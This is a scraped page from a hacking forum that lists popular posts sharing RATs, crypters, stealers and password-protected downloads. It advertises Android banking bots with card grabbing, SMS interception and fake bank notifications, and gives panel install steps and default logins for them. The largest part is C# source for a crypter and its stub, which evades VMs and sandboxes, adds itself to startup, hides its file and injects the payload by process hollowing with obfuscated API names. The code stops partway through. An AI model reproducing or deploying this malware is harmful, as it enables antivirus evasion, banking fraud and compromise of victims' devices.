Welcome to The Forum

Register now to gain access to all of our features. Once registered and logged in, you will be able to create topics, post replies to

existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile

and so much more. This message will be removed once you have signed in.

Active Hackers

The best community of active hackers. This community has been working in hacking for more than 10 years.

Hacker Forum

Hacker from all countries join this community to share their knowledge and their hacking tools

 

    Hacking Tools

    You can find thousands of tools shared by hackers. RAT's, Bot's, Crypters FUD, Stealers, Binders, Ransomware,, Mallware, Virus, Cracked Accounts, Configs, Guides, Videos and many other things.

      PRIV8

      Become a Priv8 user and access all parts of the forum without restrictions and without limit of download. It only costs 100 dollars, and it will last you for a lifetime.

      Read Rules

      In this community we follow and respect rules, and they are the same for everyone, regardless of the user's rank. Read the rules well not to be prohibited.

      Leaderboard


      Popular Content

      Showing content with the highest reputation on 03/06/2019 in all areas

      1. 2 points
        Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      2. 2 points
        😛 AutoIT [HIDE][Hidden Content]] Pass: level23hacktools.com [Hidden Content]
      3. 2 points
        Website: [Hidden Content] Download: [Hidden Content] Password: level23hacktools.com
      4. 1 point
        Description from website: With Bunifu .NET UI Framework, creating beautiful user-interfaces is highly simplified. You don’t have to be a great designer to create quality & modern user-interfaces; Bunifu .NET UI Framework does it for you. 1. Open Visual Studio 2. Create A Project (Winform (C# or VB.NET)) 3. Go To Toolbox-> Right Button Click On The Toolbox Blank Space -> Click Add Tab -> Give Any Name -> Drug And Drop The DLL To The Tab... 4. Done [Hidden Content] Version 1.8.0.1 Release date: 19th September, 2018 Fixed an issue where the attached docking Form flickers during an undocking operation Enhancements [Hidden Content] Pass: level23hacktools.com
      5. 1 point
        Features of the bot: - Graber cards - Spam on user contacts - Calling the number - Forwarding incoming calls - Launching user applications - Automatic withdrawal of fake notifications, with taken bank icons - Interception, block-deleting incoming SMS, sending, including short numbers - Download all user application names - Graber contacts - Screen locker - Launch pages in the browser - Launch user applications - Search for Bank applications - Browser history graber - Socks5 module - Sending USSD - Geolocation - Spam by number base Admin panel: Detailed statistics on countries, app, url histories, selerians, etc. The ability to issue commands to a particular bot, group, as well as all newcomers. Search by imei, sorting by installed applications, online bots, seler, countries. Cleaning of old logs. Separate statistics for traffic. Jabber notification. There is a possibility to load their injections, with the admin panel. Search by SMS, logs. Searching for links by history. The statistics for the tasks that have been issued are fulfilled. Etc. Additional info: The size of the bot is 150 kb. Stable work on Android 4-7. For basic work, root rights are not required. Request admin rights. To change the phone password, you need the admin rights (requested when installing). Change the password to Android Nougat (Android 7) version in part. Sending and intercepting SMS on all versions, deleting up to 4.4, downloading all SMS from 4.4, block SMS over 4.4 via SMS manager / Screen Locker (when locked via SMS manager, SMS is not seen only by the Holder). Permanent withdrawal of bank (fake) notifications with bank icons, the text can be set with the admin panel when you click on the message the injection is started. In the presence of injections of euro countries, they are bundled with a bot. An additional functional is possible. Android Bot Loki We want to offer a bot of our own developments. A completely new bot engine, the wishes of the customers are part of the functions of are automated, advanced functionality. Bot features: - Card grabber - Phone contacts spam - Custom numbers spam - Call to number - Incoming call forwarding - Start user applications - Automatic invoke fake notifications with custom icons - Catch, block, delete incoming SMS. Sent new SMS - Get list of user applications - Contact grabber - Screen locker - Web application browser - Bank applications searching - Browser history grabber - Socks5 module - Geolocation Admin panel: Detalized statistics of countries, app, history, sellers etc ... Ability for send command to one, list , or only new bots. IMEI search. Sort by installed applications, online, sellers, countries. Cleanup old logs Dedicated statistics for sellers. Jabber notifications. Admin panel have an ability to upload your own injects. SMS, logs searching. History links searching. Task statistiks. Additional information: Bot size: 150kb Bot is working with Android 4-7 Root permissions is NOT required for common actions. There are request for getting root permissions Root permissions required for Image phone password changing Phone password changing for All Android Nougat (All Android 7) of Post Send and catch statement SMS works on all All Android versions, the delete works only for 4.4, download and block SMS works All Android 4.4 and newest Permanent display bank notifications with custom text from admin panel. Bot have injects for euro countries. \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Loki admin panel install instructions: apt-get update && apt-get upgrade -y apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y apt-get install default-jre default-jdk -y Debian 7: apt-get install ia32-libs lib32z1 lib32ncurses5 -y Debian 8: dpkg --add-architecture i386 apt-get update apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386 lib32z1 lib32ncurses5 Next: wget [Hidden Content] wget -O apktool.jar [Hidden Content] chmod +x ~/apktool.jar chmod +x ~/apktool mv ~/apktool.jar /usr/local/bin/ mv ~/apktool /usr/local/bin/ Next: unpack loki.tar to new dir. something like that: tar xf loki.tar -C /var/www/ change files owner: chown -R www-data:www-data /var/www/ Run: mysql create database loki; grant all privileges on loki.* to loki@localhost identified 'DB_PASSWORD'; grant all privileges on loki.* to loki@localhost identified by 'DB_PASSWORD'; quit import bd file loki4dev.sql: mysql loki < /var/www/site/loki4dev.sql mysql -u root -pbolonka1 loki </var/www/site/loki4dev.sql Edit: /var/www/site/db.php and enter mysql database access: db: loki db user: loki db password: DB_PASSWORD DONE!!!! address admin panel [Hidden Content] or [Hidden Content] login with name bot4fun and password J1HPbmr ...................................................................... Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      6. 1 point
        Solo funciona con mail.ru [HIDE][Hidden Content]] Pass: HN1_level23hacktools.com Server.exe Scan: [Hidden Content]
      7. 1 point
        Scan: Download: [hide][Hidden Content]] Password: level23hacktools.com
      8. 1 point
        > sportp2p.com/live-stream/ lshunter.net/live/ mytvfree.me tvfree.me aovivoagora.com aovivoagora.online assia.tv assistirtvbr.tv assistirtvonline.tv atdhe.eu atdhe.mx atdhes.eu atdhe.me atdhe.cc More sites will be added later Download: [Hidden Content] Virus Scan: [Hidden Content]
      9. 1 point
        Scan: Stub(0/22) :[Hidden Content] Njrat before(21/22) :[Hidden Content] Njrat after(0/22) :[Hidden Content] Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      10. 1 point
      11. 1 point
        Scan: [Hidden Content] Download: [HIDE][Hidden Content]] Passwoord: level23hacktools.com
      12. 1 point
        Supported Applications: All 32-bit, 64-bit and “Any CPU” apps, including Console, GUI, Windows Forms (WinForms), WPF and ASP.Net apps, libraries, components, controls, VSTO based Word/Excel/Outlook/etc Office Add-Ins, Windows Services & WCF Services. Obfuscated apps are FIPS compliant. Supported Tools: All editions of Visual Studio 2013, Visual Studio 2012, Visual Studio 2010, Visual Studio 2008, Visual Studio 2005, Visual Studio 2003, Visual Studio 2002. Supported .Net Frameworks: All from .Net Framework 1.0 to .Net Framework 4.5. Supported Languages: All managed languages including C#, Visual Basic.Net (VB.Net), Managed C++, J# and many others. .Net Compact Framework: 1.1, 2.0, 3.5 & 4.0. Silverlight: 2.0, 3.0, 4.0 and 5.0 including Silverlight for Windows Phone 7.0/7.5/8.0 and above. Metro Framework: Supports Windows 8 Metro/WinRT apps. XNA Framework: 2.0, 3.0 & 4.0 .Net Micro Framework: 3.0 & 4.0 Additional Frameworks Supported: Mono Assemblies and Mono-Android Assemblies and Unity3D assemblies. Supported OS: 32-bit (x86) and 64-bit (x64) versions of: Windows 8, Windows 7, Windows Vista, Windows XP, Windows 2008, Windows 2003, Windows 2000, Windows Me, Windows 98, Windows NT [Hidden Content] [HIDE][Hidden Content]] Pass: level23hacktools.com
      13. 1 point
        [HIDE][Hidden Content]] Pass: level23hacktools.com
      14. 1 point
        THC-Hydra is a very fast (multi-threaded) network logon cracker which supports many different services: AFP, Cisco, cisco-enable, CVS, Firebird, ftp, http-get, http-head, http-proxy, https-get, https-head, https-form-get, https-form-post, ICQ, IMAP, IMAP-NTLM, ldap2, ldap3, MySQL, mysql, NCP, nntp, oracle-listener, PCAnywhere, pcnfs, pop3, pop3-NTLM, Postgres, rexec, rlogin, rsh, sapr3, sip, smb, smbnt, SMTP-auth, SMTP-auth-NTLM, SNMP, socks5, ssh2, svn, TeamSpeak, telnet, vmauthd, vnc. THIS TOOL IS FOR LEGAL PURPOSES ONLY! Changelog 8.8 * New web page: [Hidden Content] * added PROBLEMS file with known issues * rdp: disabled the module as it does not support the current protocol. If you want to add it contact me * ldap: fixed a dumb strlen on a potential null pointer * http-get/http-post: – now supports H=/h= parameters same as http-form (thanks to mathewmarcus@github for the patch) – 403/404 errors are now always registered as failed attempts * mysql module: a non-default port was not working, fixed * added -w timeout support to ssh module * fixed various memory leaks in http-form module * corrected hydra return code to be 0 on success * added patch from debian maintainers which fixes spellings * fixed weird crash on x64 systems * many warning fixes by crondaemon [Hidden Content]
      15. 1 point
      16. 1 point
        The cryptors were taken from another forum, they were hidden from ordinary users. I decided to share with you. Take my friends ScanMyBin IMG IMG2 Download PCLOUD
      17. 1 point
        android loader installation guide 20/11/17 Server requirements: - OS debian 7.0 or newer - RAM 2 Gb or more - apache 2 - php 5 - mysql 1. bot Open folder 'bot' in Android studio 2.0 or higher Set correct server ip or domain in bot/app/src/main/java/task/loader/Constants.java Build apk 2. panel Upload panel to the server Setup apache with panel/apache_loader.conf Create mysql database named 'loader' and import panel/db_loader.sql Set mysql access data in panel/db.php Copy panel/video/aapt/libc++.so to /usr/lib/ Setup basic auth in panel/video/.htaccess: htpasswd -cb /var/data/loader.passwd USER PASSWORD make panel/tmp writeable 3. usage - install loader on the phone - open panel with default login 'admin' and password '123123' - bot should appear in 'Bots' section - upload target apk (that should be installed by loader) to any host - create new task in Loader panel, set direct url to apk - set number of attemps - how much times loader will propose user to install the target apk - make task 'active' - make sure loader is installed on your device, disable screen - enable screen again - loader will propose you to install the target apk - it will propose user to install every 20 seconds once it will be done Optionally you can show landing page first, set url of the landing in the task settings Download: [HIDE][Hidden Content]] Password: level23hacktools.com
      18. 1 point
      19. 1 point
        Invalid key, pls someone share the activation key here on comment..
      20. 1 point
        @alenkad94 click in like button
      21. 1 point
        Tipos de malware y detección AV's. • Medidas de evasión. • Crypters. • tipos y funcionamiento. • stub. • stub FUD. • técnicas Modding. [hide][Hidden Content]]
      22. 1 point
        [HIDE-THANKS] >using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.Forms; using System.Diagnostics; using Microsoft.Win32; using System.Threading; namespace WindowsFormsApplication1 { public partial class Form1 : Form { public Form1() { InitializeComponent(); } private void button2_Click(object sender, EventArgs e) { OpenFileDialog d = new OpenFileDialog(); if (d.ShowDialog() == DialogResult.OK) txtLinkToFile.Text = d.FileName; } private void button1_Click(object sender, EventArgs e) { System.Resources.ResourceWriter w = new System.Resources.ResourceWriter("res.resources"); w.AddResource("file", RC4EncryptDecrypt(System.IO.File.ReadAllBytes(txtLinkToFile.Text), "nitin890")); w.Close(); System.CodeDom.Compiler.CompilerParameters p = new System.CodeDom.Compiler.CompilerParameters(); p.GenerateExecutable = true; p.OutputAssembly = "Crypted.exe"; p.ReferencedAssemblies.Add("System.dll"); p.EmbeddedResources.Add("res.resources"); p.CompilerOptions += "/t:winexe"; System.CodeDom.Compiler.CompilerResults r = new Microsoft.CSharp.CSharpCodeProvider().CompileAssemblyFromSource(p, Properties.Resources.Source); System.IO.File.Delete("res.resources"); foreach (System.CodeDom.Compiler.CompilerError err in r.Errors) MessageBox.Show(err.ToString()); MessageBox.Show("Crypted! Saved as Crypted.exe!", "Complete!", MessageBoxButtons.OK, MessageBoxIcon.Information); } public byte[] RC4EncryptDecrypt(byte[] bytes, string Key) { byte[] key = System.Text.Encoding.ASCII.GetBytes(Key); byte[] s = new byte[256]; byte[] k = new byte[256]; byte temp; int i, j; for (i = 0; i { s[i] = (byte)i; k[i] = key[i % key.GetLength(0)]; } j = 0; for (i = 0; i { j = (j + s[i] + k[i]) % 256; temp = s[i]; s[i] = s[j]; s[j] = temp; } i = j = 0; for (int x = 0; x { i = (i + 1) % 256; j = (j + s[i]) % 256; temp = s[i]; s[i] = s[j]; s[j] = temp; int t = (s[i] + s[j]) % 256; bytes[x] ^= s[t]; } return bytes; } private void txtLinkToFile_TextChanged(object sender, EventArgs e) { } } } >using System; using System.Collections.Generic; using System.Data; using System.Drawing; using System.Diagnostics; using System.Text; using System.Windows.Forms; using System.IO; using System.Runtime.InteropServices; using System.Resources; using System.Security.Cryptography; using System.Reflection; using Microsoft.Win32; using System.Security.Principal; using System.Net; using System.Management; [assembly: AssemblyTitle("[assemblytitle]")] [assembly: AssemblyDescription("[assemblyinfo]")] [assembly: AssemblyCompany("[assemblycorp]")] [assembly: AssemblyProduct("[assemblyproduct]")] [assembly: AssemblyCopyright("[assemblycopyright]")] [assembly: AssemblyTrademark("[assemblytrademark]")] [assembly: AssemblyVersionAttribute("[assemblyversion]")] [assembly: AssemblyFileVersionAttribute("[assemblyfileversion]")] static class Program { [sTAThread] static void Main() { Application.EnableVisualStyles(); Application.SetCompatibleTextRenderingDefault(false); Application.Run(new PG()); } } class RX { [DllImport("kernel32.dll")] static extern IntPtr GetModuleHandle(string module); [DllImport( "kernel32.dll", SetLastError=true )] static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType); [DllImport("kernel32.dll", SetLastError=true)] static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo); [DllImport("kernel32.dll", SetLastError=true)] static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo); public static byte[] RM() { ResourceManager Manager = new ResourceManager("Encrypted", Assembly.Load(File.ReadAllBytes(Application.ExecutablePath))); byte[] bytes = (byte[])Manager.GetObject("encfile"); return bytes; } } public partial class PG : Form { static bool waited = false; private void InitializeComponent() { this.SuspendLayout(); this.FormBorderStyle = FormBorderStyle.None; this.ShowInTaskbar = false; this.ResumeLayout(false); this.Visible = false; this.WindowState = FormWindowState.Minimized; bool dBool = false; if(dBool){ System.Timers.Timer dTimer = new System.Timers.Timer(); dTimer.Interval = (1000) * (1); dTimer.Elapsed += delayTimer_Elapsed; dTimer.Enabled = true; dTimer.Start(); while(!waited){} } bool pBool = false; if(pBool){ this.FormClosing += Closing; } } void delayTimer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) { waited = true; } void Closing(object sender, FormClosingEventArgs e) { Process.Start(Application.ExecutablePath); } public PG() { InitializeComponent(); string injectionType = "[injectionType]"; string injectionPath = ""; switch(injectionType.ToLower()){ case "notepad.exe": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");//@"C:\Windows\System32\notepad.exe"; break; case "vbc.exe": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe"); break; case "default browser": injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");//BrowserPath(); break; default: injectionPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe"); break; } bool adminonly = [adminonly]; bool msgbox = [msgbox]; bool startup = [startup-replace]; bool hide = [hide-replace]{!.estebbc:{"post_id":28763,"user_id":1}}; string storagemethod = "[storage-replace]"; bool downloader = [downloader-replace]; bool detectVM = [detectVM]; bool detectSandboxie = [detectSandboxie]; if(detectVM) { if(IsVM()) { MessageBox.Show("This process does not support VMs!", "Error!", MessageBoxButtons.OK, MessageBoxIcon.Error); Process.GetCurrentProcess().Kill(); } } if(detectSandboxie) { if(IsSandbox(Application.ExecutablePath)) { MessageBox.Show("This process does not support Sandboxes!", "Error!", MessageBoxButtons.OK, MessageBoxIcon.Error); Process.GetCurrentProcess().Kill(); } } if(adminonly){ if(!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)){ ProcessStartInfo pInfo = new ProcessStartInfo(); pInfo.FileName = Application.ExecutablePath; pInfo.Verb = "runas"; Process.Start(pInfo); Process.GetCurrentProcess().Kill(); } } if(downloader) { string url = "[downloaderurl]"; /*WebClient webClient = new WebClient(); webClient.DownloadFile(new Uri(url), "dl" + System.AppDomain.CurrentDomain.FriendlyName); System.IO.File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); System.IO.File.Move("dl" + System.AppDomain.CurrentDomain.FriendlyName, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); FileInfo Info = new FileInfo(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName); Info.Attributes = FileAttributes.Hidden; System.Diagnostics.Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "dl" + System.AppDomain.CurrentDomain.FriendlyName);*/ } if(msgbox){ MessageBoxIcon icon; switch("[msgboxicon]"){ case "info": icon = MessageBoxIcon.Information; break; case "error": icon = MessageBoxIcon.Error; break; case "warning": icon = MessageBoxIcon.Warning; break; case "none": icon = MessageBoxIcon.None; break; default: icon = MessageBoxIcon.None; break; } MessageBox.Show("[msgboxbody]", "[msgboxtitle]", MessageBoxButtons.OK, icon); } byte[] filebytes = null; filebytes = RX.RM(); filebytes = AESDecrypt(filebytes, "[key-replace]"); IX.AA(filebytes, injectionPath); string installpath = "[installpath]"; if(installpath == "%appdata%"){ installpath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + System.AppDomain.CurrentDomain.FriendlyName; } if(installpath == "%tmp%"){ installpath = Path.GetTempPath() + System.AppDomain.CurrentDomain.FriendlyName; } if (!File.Exists(installpath)) { File.Copy(Application.ExecutablePath, installpath); } if (startup) AddToStartup(installpath); if (hide) HideFile(); } public static bool IsSandbox(string startupPath) { StringBuilder username = new StringBuilder(); Int32 nSize = 50; GetUserName(username, ref nSize); if ((int)GetModuleHandle("SbieDLL.dll") != 0) return true; switch (username.ToString().ToUpper()) { case "USER": return true; case "SANDBOX": return true; case "VIRUS": return true; case "MALWARE": return true; case "SCHMIDTI": return true; case "CURRENTUSER": return true; } string sPath = startupPath.ToUpper(); if (sPath == "C:\\FILE.EXE") return true; if (sPath.Contains("\\VIRUS")) return true; if (sPath.Contains("SANDBOX")) return true; if (sPath.Contains("SAMPLE")) return true; if ((int)FindWindow("Afx:400000:0", (IntPtr)0) != 0) return true; return false; } [DllImport("advapi32.dll", SetLastError = true)] public static extern bool GetUserName(StringBuilder sb, ref Int32 length); [DllImport("kernel32.dll")] public static extern IntPtr GetModuleHandle(string lpModuleName); [DllImport("user32.dll", SetLastError = true)] static extern IntPtr FindWindow(string lpClassName, IntPtr ZeroOnly); [DllImport("kernel32.dll")] extern public static IntPtr GetProcAddress(IntPtr hModule, string procedureName); [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern uint GetFileAttributes(string lpFileName); public static bool IsVM() { if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VBOX")) { return true; } if (regGet("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("VBOX")) { return true; } if (regGet("HARDWARE\\Description\\System", "VideoBiosVersion").ToUpper().Contains("VIRTUALBOX")) { return true; } if (regGet("SOFTWARE\\Oracle\\VirtualBox Guest Additions", "") == "noValueButYesKey") { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\VBoxMouse.sys") != (uint)4294967295) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SOFTWARE\\VMware, Inc.\\VMware Tools", "") == "noValueButYesKey") { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 1\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 2\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SYSTEM\\ControlSet001\\Services\\Disk\\Enum", "0").ToUpper().Contains("vmware".ToUpper())) { return true; } if (regGet("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000", "DriverDesc").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\Settings", "Device Description").ToUpper().Contains("VMWARE")) { return true; } if (regGet("SOFTWARE\\VMware, Inc.\\VMware Tools", "InstallPath").ToUpper().Contains("C:\\PROGRAM FILES\\VMWARE\\VMWARE TOOLS\\")) { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmmouse.sys") != (uint)4294967295) { return true; } if (GetFileAttributes("C:\\WINDOWS\\system32\\drivers\\vmhgfs.sys") != (uint)4294967295) { return true; } // Detected whine if (GetProcAddress((IntPtr)GetModuleHandle("kernel32.dll"), "wine_get_unix_file_name") != (IntPtr)0) { return true; } if (regGet("HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0", "Identifier").ToUpper().Contains("QEMU")) { return true; } if (regGet("HARDWARE\\Description\\System", "SystemBiosVersion").ToUpper().Contains("QEMU")) { return true; } ManagementScope scope = new ManagementScope("\\\\.\\ROOT\\cimv2"); ObjectQuery query = new ObjectQuery("SELECT * FROM Win32_VideoController"); ManagementObjectSearcher searcher = new ManagementObjectSearcher(scope, query); ManagementObjectCollection queryCollection = searcher.Get(); foreach (ManagementObject m in queryCollection) { if (m["Description"].ToString() == "VM Additions S3 Trio32/64") { return true; } if (m["Description"].ToString() == "S3 Trio32/64") { return true; } if (m["Description"].ToString() == "VirtualBox Graphics Adapter") { return true; } if (m["Description"].ToString() == "VMware SVGA II") {return true; } if (m["Description"].ToString().ToUpper().Contains("VMWARE")) {return true; } if (m["Description"].ToString() == "") { return true; } } return false; } public static string regGet(string key, string value) { RegistryKey registryKey; registryKey = Registry.LocalMachine.OpenSubKey(key, false); if (registryKey != null) { object rkey = registryKey.GetValue(value, (object)(string)"noValueButYesKey"); if (rkey.GetType() == typeof(string)) { return rkey.ToString(); } if (registryKey.GetValueKind(value) == RegistryValueKind.String || registryKey.GetValueKind(value) == RegistryValueKind.ExpandString) { return rkey.ToString(); } if (registryKey.GetValueKind(value) == RegistryValueKind.DWord) { return Convert.ToString((Int32)rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.QWord) { return Convert.ToString((Int64)rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.Binary) { return Convert.ToString((byte[])rkey); } if (registryKey.GetValueKind(value) == RegistryValueKind.MultiString) { return string.Join("", (string[])rkey); } return "noValueButYesKey"; } return "noKey"; } public static byte[] AESDecrypt(byte[] input, string Pass) { System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged(); byte[] hash = new byte[32]; byte[] temp = new MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.ASCII.GetBytes(Pass)); Array.Copy(temp, 0, hash, 0, 16); Array.Copy(temp, 0, hash, 15, 16); AES.Key = hash; AES.Mode = System.Security.Cryptography.CipherMode.ECB; System.Security.Cryptography.ICryptoTransform DESDecrypter = AES.CreateDecryptor(); return DESDecrypter.TransformFinalBlock(input, 0, input.Length); } public void AddToStartup(string installpath_) { if (installpath_ == null || installpath_ == "") { installpath_ = Path.GetTempPath() + System.AppDomain.CurrentDomain.FriendlyName; } RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true); Key.SetValue("[startup-name]", installpath_); } public void HideFile() { FileInfo Info = new FileInfo(Application.ExecutablePath); Info.Attributes = FileAttributes.Hidden; } } public class IX { [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] internal static extern IntPtr LoadLibraryA([in, MarshalAs(UnmanagedType.LPStr)] string lpFileName); [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] static extern IntPtr GetProcAddress(IntPtr hModule, string procName); delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo); delegate bool EXT(IntPtr hThr, uint[] ctxt); delegate bool TEX(IntPtr t, uint[] c); //all kernel32 delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead); delegate uint EAD(IntPtr hThread); //kernel32.dll delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot); delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect); delegate bool MOR(IntPtr hProcess, IntPtr naddr, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll delegate bool OP(byte[] bytes, string surrogateProcess); public T CreateAPI(string name, string method) { return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T)); } public static bool AA(byte[] bytes, string surrogateProcess) { IX p = new IX(); OP F1 = new OP(p.Q); bool Res = F1(bytes, surrogateProcess); return true; } public bool Q(byte[] bytes, string surrogateProcess) { String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108; ESS CP = CreateAPI("kernel32", Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65); ION NUVS = CreateAPI(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110); EXT GTC = CreateAPI("kernel32", Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); TEX STC = CreateAPI("kernel32", Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116); ORY RPM = CreateAPI("kernel32", Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); EAD RT = CreateAPI("kernel32", Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100); CEX VAE = CreateAPI("kernel32", Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120); CTEX VPE = CreateAPI("kernel32", Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120); MOR WPM = CreateAPI("kernel32", Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121); try { IntPtr procAttr = IntPtr.Zero; IntPtr[] processInfo = new IntPtr[4]; byte[] startupInfo = new byte[0x44]; int num2 = BitConverter.ToInt32(bytes, 60); int num = BitConverter.ToInt16(bytes, num2 + 6); IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54)); if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo)) { uint[] ctxt = new uint[0xb3]; ctxt[0] = 0x10002; if (GTC(processInfo[1], ctxt)) { IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L); IntPtr buffer = IntPtr.Zero; IntPtr bufferSize = new IntPtr(4); IntPtr numRead = IntPtr.Zero; if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0)) { IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34)); IntPtr sz = new IntPtr((Int32)BitConverter.ToUInt32(bytes, num2+80)); IntPtr naddr = VAE(processInfo[0], addr, sz, 0x3000, 0x40); int lpNumberOfBytesWritten; WPM(processInfo[0], naddr, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten); int num5 = num - 1; for (int i = 0; i { int[] mzt = new int[10]; Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), mzt, 0, 40); byte[] buffer2 = new byte[(mzt[4] - 1) + 1]; Buffer.BlockCopy(bytes, mzt[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length); addr = new IntPtr(buffer2.Length); sz = new IntPtr(naddr.ToInt32() + mzt[3]); WPM(processInfo[0], sz, buffer2, (uint)addr, out lpNumberOfBytesWritten); } sz = new IntPtr(ctxt[0x29] + 8L); addr = new IntPtr(4); int nInt = naddr.ToInt32(); byte[] bN = BitConverter.GetBytes(Convert.ToUInt32(nInt)); Int64 i6 = addr.ToInt64(); uint u = (uint)0; WPM(processInfo[0], sz, bN, u, out lpNumberOfBytesWritten); ctxt[0x2c] = (uint)(naddr.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40)); STC(processInfo[1], ctxt); } } 